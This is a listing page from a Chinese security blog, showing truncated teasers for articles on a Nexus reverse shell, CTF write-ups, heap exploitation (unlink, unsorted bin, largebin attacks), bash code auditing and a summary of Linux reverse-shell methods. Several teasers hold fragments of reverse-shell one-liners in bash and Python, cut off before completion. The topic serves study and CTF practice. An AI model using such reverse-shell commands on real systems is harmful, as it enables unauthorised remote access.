bin - 第 10 | CN-SEC 中文网

安全博客

Nexus反弹shell

Nexus反弹shellhttp://target/#admin/system/tasks 捕获#通用 ['/bin/bash','-c','/bin/bash -i >& /dev/t...

11月30日195 views已关闭评论

阅读全文

未分类

羊城杯wp

1PWN1、Babyrop栈溢出，且存在后门函数；利用func1将'/cin/sh'修改为'/bin/sh'，利用func2调用参数执行system('/bin/sh')即可#!usr/bin/env...

09月23日44 views评论

阅读全文

安全博客

红帽杯 2017 线上初赛 WriteUp

签到 (Misc10) 题目：关注公众号"CTFer的魔法棒"回复"ctf"获取flag 关注微信公众号「CTFer的魔法棒」，关注后在公众号中发送 ctf 就会自动回复本题的 FLAG flag{B...

09月15日49 views评论

阅读全文

如何让脚本定时执行

一、计划任务1. 非root用户创建计划任务 crontab -u bin -e crondtab-u bin -l &n...

09月08日安全闲碎69 views评论

阅读全文

安全博客

HITCON 2015 BabyFirst（命令执行绕正则）

题目地址：https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_4/index.php 借上次的docker环境，稍微改了下...

08月21日213 views评论

阅读全文

安全文章

某设备快速代码审计 (Bash审计)

一：挖掘思路🐑#!/bin/sh#This script is created by ssparser automatically. The parser first created by MaoSh...

08月16日147 views评论

阅读全文

SecIN安全技术社区

堆的unlink利用

在刷Buuctf时看了一下关于pwn的堆部分题，发现一般题型都是有套路的，所以整理下堆题中常用的技术，本文介绍unlink的原理与利用。 unlink介绍产生原因我们知道link有链的意思，那un...

07月18日131 views已关闭评论

阅读全文

SecIN安全技术社区

堆的unsorted bin attack利用

介绍概述 unsorted bin在堆题中常用于泄露libc地址，通过unsorted bin可以向任意一个地址写入一个不可控的大数字，使用前提是需要能够控制unsorted bin中chunk的b...

07月18日267 views已关闭评论

阅读全文

SecIN安全技术社区

堆的largebin attack利用

介绍结构 large bin与其他bin的结构都不同，它多了两个指针fd_nextsize和bk_nextsize，直接说难以理解它的结构，先放一张图后边慢慢说它的结构：上图是large bin的...

07月18日109 views已关闭评论

阅读全文

逆向工程

原创 | 堆的unsorted bin attack利用

点击上方蓝字关注我吧介绍概述unsorted bin在堆题中常用于泄露libc地址，通过unsorted bin可以向任意一个地址写入一个不可控的大数字，使用前提是需要能够控制unsorted bi...

05月30日130 views评论

阅读全文

SecIN安全技术社区

iot漏洞挖掘环境搭建梳理

iot环境配置总结配置 win10 Ubuntu16虚拟机说明刚入门很大的一个问题是不知道要安装什么软件，对于网上搭建环境的教程都只是告诉安装什么工具，一通乱搞最后不知道自己装了什么。文章将讲...

05月11日598 views评论

阅读全文

安全文章

Linux下几种反弹Shell方法的总结与理解

转自墨痕诉清风的博客常用python/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,soc...

04月24日33 views评论

阅读全文

在线咨询

微信